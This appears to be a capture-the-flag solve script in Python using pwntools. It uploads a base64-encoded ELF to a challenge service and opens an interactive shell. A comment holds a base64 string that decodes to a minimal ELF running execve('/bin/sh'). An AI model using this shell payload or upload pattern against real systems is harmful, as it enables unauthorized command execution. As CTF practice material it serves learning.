/..

#CONTENT

#TOP

solve.py
PYTHON
from pwn import *
from base64 import b64encode

if args.REMOTE or args.HOST or args.PORT:
    p = remote(args.HOST or "localhost", args.PORT or "5000")

poc = open("poc.elf", "rb").read()

p.sendlineafter(b": ", b64encode(poc))

p.interactive()

# f0VMRg8FSI15NuscAQAAAAMAPgAMAAAAAAAAAAwAAAAMAAAAAAAAADHAsDsPBQAAAAAAAEAAOAABAAAAL2Jpbi9zaAAAAADruw==